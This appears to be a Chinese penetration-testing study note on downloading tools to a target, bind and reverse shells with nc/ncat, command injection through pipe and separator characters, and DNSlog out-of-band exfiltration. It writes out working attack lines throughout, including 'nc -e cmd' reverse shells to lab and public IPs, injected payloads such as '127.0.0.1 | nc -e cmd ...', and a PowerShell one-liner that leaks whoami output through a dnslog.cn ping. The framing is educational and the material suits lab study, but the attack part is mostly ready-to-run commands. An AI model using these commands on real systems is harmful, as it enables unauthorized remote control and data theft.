首页 > 系统相关 >《渗透测试》 反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载day8

《渗透测试》 反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载day8

时间:2023-03-05 20:45:00浏览次数:47  
标签:SHELL day8 0.1 5566 nc ping cmd 127.0 显带

导图

 

#常规基本渗透命令详解

https://blog.csdn.net/weixin_43303273/article/details/83029138

 

#实用案例1:文件上传下载-解决无图形化&解决数据传输

命令生成:https://forum.ywhack.com/bountytips.php?download

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

1.1 .如何下载靶机的nc文件

将nc.exe文件放到www目录下

 

 

 1.2 如果报错说明需要修改nc.exe文件的管理权限

 

 

1. 3 到属性的安全中查找Everyone并将其设置为完全控制权限

 

1.4 使用windows命令窗口下载nc.exe文件

1.4.1 进入棱角社区 改变ip 端口 文件名等信息

 

 

 1.4.2 选择一个命令

 

 

 1.4.3 打开cmd窗口,运行命令 可以看到命令执行文件下载

 1.4.4 使用linux系统下载文件

#实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

命令生成:https://forum.ywhack.com/shell.php

 

2、正向连接:本地监听等待对方连接  

2.1 Linux控制Windows    将windows靶机的cmd绑定到他的5566端口上,然后让攻击机去连接靶机的5566端口

2.1.1 winodws:绑定CMD到本地5566端口

nc -e cmd -lvp 5566

 

2.1.2 linux主动连接目标windows的5566

ncat 192.168.10.12 5566

 

2.2 Windows控制Linux

2.2.1 linux绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566

2.2.2 windows主动连接目标5566

nc 192.168.10.13 5566

 

 

2、反向连接:主动给出去,对方监听

2.1 linux 绑定CMD到目标5566端口

linux: ncat -e /bin/sh 192.168.10.12 5566

//等待5566连接

nc -lvvp 5566

 

 

 

2.2 Windows绑定CMD到目标5566端口    将靶机的cmd绑定到攻击机的5566端口上

nc -e cmd 192.168.10.13 5566

 

 

 

//等待5566连接

ncat -lvvp 5566  靶机监听自己的5566端口数据

 

 

 

#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

管道符:| (管道符号) ||(逻辑或) &&(逻辑与)  &(后台任务符号)

Windows:      | & || &&

Linux:            ; | || & && ``(特有``和;)

例子:

 ping -c 1 127.0.0.1 ; whoami

ping -c 1 127.0.0.1 | whoami   

ping -c 1 127.0.0.1 || whoami

ping -c 1 127.0.0.1 & whoami

ping -c 1 127.0.0.1 `whoami`

 

1、判断windows

2、windows没有自带的nc

3、想办法上传nc 反弹权限

4、反弹

开启入站策略,采用反向连接

Linux:ncat -lvvp 5566

Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566

开启出站策略,采用正向连接

Linux:ncat -e cmd 47.122.23.131 5566

Windows:127.0.0.1 | nc -e cmd -lvvp 5566

正反向反弹案例-内网服务器

只能内网主动交出数据,反向连接

 

#实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

出站入站都开启策略(数据不回显):OSI网络七层

127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.f4an93.dnslog.cn';$z=$x+$y;ping $z

 

 

漏洞有,但是数据不回显:

1、反弹shell

2、带外查询

 

确定能执行命令

windows

ping 127.0.0.1 |

 

为什么要这样写

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量

结果带有“\” 导致ping无法执行

 

powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

 

127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

标签:SHELL,day8,0.1,5566,nc,ping,cmd,127.0,显带
From: https://www.cnblogs.com/muqing1/p/17180951.html

相关文章

  • 任意Exe转ShellCode?
    之前写过一个远控,但一直在琢磨如何生成shellcode,今天偶然看见一个项目:sRDI,github上就有这个项目主要就是将dll转成shellcode,于是我就想到了“写一个输出文件的dll,然后将这......
  • shell编程语言-shell函数与case用法
                                    建立自己的linux系统脚本:             ......
  • html-day8
    javascrip的引入javascrip是一种脚本语言,具有函数优先的轻量级,解释型或即时编译型的编程语言。虽然它是作为开发Web页面的脚本语言而出名,但是它也被用到了很多非浏览器环......
  • Linux shell使用详解
    shell用于解释用户输入的命令,将命令解释为二进制代码,并将结果返回到命令终端上。语法:文件:xxx.sh#!/bin/bash#comments,命令注释具体命令...具体命令执行.sh文件方式:#......
  • # Shell 是什么?
    原文:WhatisaShell?注意:本文是对原文的一个翻译!Shell是一个宏处理器,用于执行命令。宏处理器意味着,将文本和符号展开,创建一个更大的表达式。Unixshell既是一个命令解......
  • shell编程-流程控制
                        ......
  • shell编程-条件测试
         ......
  • Shell脚本练习
    企业面试题京东问题1:使用Linux命令查询file1中空行所在的行号。[root@server~]#catfile1问题1:使用Linux命令查询file1中空行所在的行号。[root@server~]#awk'/^......
  • 常用Linux shell命令汇总,总有一条你需要
    对于经常使用linux系统的博主来说,基本常用的shell命令是少不了的,总结一下,哪天不会了,可以来翻看下O(∩_∩)O。对你有用记得收藏哦!欢迎补充!1.检查远程端口是否对bash开放:......
  • reverse-shell(updating)
    title:reverse-shelldate:2023-03-0121:17:10tags:(写在前面)0.为什么想写这个今天尝试搭建了vulhub靶场(CentOS),搭建过程中出了n个问题,但都在网上找到了答案,然后这......